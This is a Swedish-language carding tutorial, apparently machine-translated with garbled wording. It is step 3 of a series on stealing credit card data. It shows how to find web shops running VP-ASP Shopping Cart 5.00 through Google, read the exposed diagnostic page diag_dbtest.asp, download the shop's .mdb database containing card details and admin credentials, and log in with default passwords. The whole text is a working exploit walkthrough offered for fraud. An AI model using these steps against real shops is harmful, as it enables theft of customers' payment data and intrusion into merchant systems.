KARDNING??? (3 / 4 steg)

Steg 3: Hur till hacka??

Kreditkort Hacking

Kreditkort kan hacka av två sätt:

• Kreditkort bedrägerier (vanligen används för att tjäna pengar, några gånger för shopping)
• Kreditkort butik admin hacka (bara på kul, kunskap, shopping på internet)

Butik ADMIN metod för att stjäla kreditkort:

Låter start: dess en mycket gammal metod som knappt fungerar men ändå har ett hopp på VP-ASP

Shopping Cart Version: 5,00

1. gå till google.com och typ: VP-ASP Shopping Cart 5.002. Du kan hitta många av webbplatser med VP-ASP 5,00 cart installerat på den

Låt oss nu gå till utnyttja...

Sidan kommer att vara så här: ***://***.victim.com/shop/shopdisplaycategories.asp

Exploit är: diag_dbtest.aspNow du måste göra detta: ***://***.victim.com/shop/diag_dbtest.asp

En sida visas innehåller de:

• xDatabase

• shopping140

• xDblocation

• resx

• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe

Exempel:

Viktigaste här är xDatabasexDatabase: shopping140Ok, nu URL-adressen kommer att vara så här: ***://***.victim.com/shop/shopping140.mdb

Om du inte hämta databasen, prova detta samtidigt som det finns dblocation:xDblocation

resxthe

URL-adressen blir: ***://***.victim.com/shop/resx/shopping140.mdb

Hämta den mdb-filen och du bör kunna öppna den med någon mdb fil betraktare, du bör kunna hitta en på download.com eller använda MS Office Access.Inside bör du kunna hitta information om kreditkort, och du bör även kunna hitta admin användarnamn och lösenord för webbplatsen.

Admin login-sidan finns vanligtvis här: ***://***.victim.com/shop/shopadmin.asp

Om du inte kan hitta admin användarnamn och lösenord i mdb-filen kan du men det är felaktigt eller du inte kan hitta filen mdb alls, sedan försöka hitta admin login-sidan och ange default lösenord som är: användarnamn: adminpassword: adminORUsername: vpasppassword: vpasp